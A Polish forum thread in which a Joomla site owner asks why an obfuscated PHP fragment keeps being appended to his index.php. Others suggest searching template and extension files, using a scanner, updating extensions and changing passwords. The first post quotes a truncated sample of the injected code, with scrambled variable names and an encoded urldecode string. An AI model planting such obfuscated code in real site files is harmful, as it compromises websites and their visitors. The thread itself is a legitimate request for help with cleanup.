PDA

Zobacz pełną wersję : problem z botem, zhakowany index.php



janekszpanek
17-11-2016, 07:44
Mam następujący problem od dłuższego czasu do pliku index.php dopisywany jest poniższy tekst, wklejam tylko mały fragment.
?php

//header('Content-Type:text/html; charset=utf-8');
$O0__O0O0O_='J6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$OO_0O0_O0_='litiopa4447';
$OO0_O0_0_O=785;
$O_O00_0OO_='index.php/flszb/B/C-D/E-cryptozygous/enseem.shtm';
$O_00__OO0O=362;
$OOO0O__0_0=1;
$O_0_O0OO0_=array("foreheaded","farthermost","jadedness","inherent","ficoid","discarnate","ensnarl","chiasmal","cuddleable",$
$OO_0O0_0O_='';
$O_0O_O0O0_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71 %79%2A6%


Joomle mam zaktualizowaną do wersji 3.6.4, stosuje również firewall Centrora Security, pliki skanowałem antyvirusem Clamav i nic nie znajduje. W logach nie mogę się doszukać podatności, przez którą powyższy fragment jest dopisywany w pliku index.php. Czy ktoś z Was spotkał się z powyższym problemem i co poradzicie by ten problem rozwiązać.

Bazyl
17-11-2016, 10:31
G: joomla postępowanie po włamaniu

dawidryba11
17-11-2016, 11:27
Program za Ciebie nie znajdzie wirusika.
Na poczatek zanurkuj w plikach templatki, jak tam nic nie bedzie to dodatki. A jak nie masz tyle czasu, to skorzystaj z uslug joomla doktorkow.;)

Wysłane z mojego E2105 przy użyciu Tapatalka

janekszpanek
18-11-2016, 07:37
Dzięki za odpowiedzi. Faktycznie żmudne wyszukiwanie złośliwych plików pomogło, do tego zainstalowałem komponent Antivirus Scanner, który znalazł to co ja przeoczyłem.

PeFik
19-11-2016, 01:43
pamiętaj, aby zaktualizować rozszerzenia i zmienić hasła i loginy.
---
A w najbliższej przyszłości zamów książkę --> http://helion.pl/view/3926o/jowozr.htm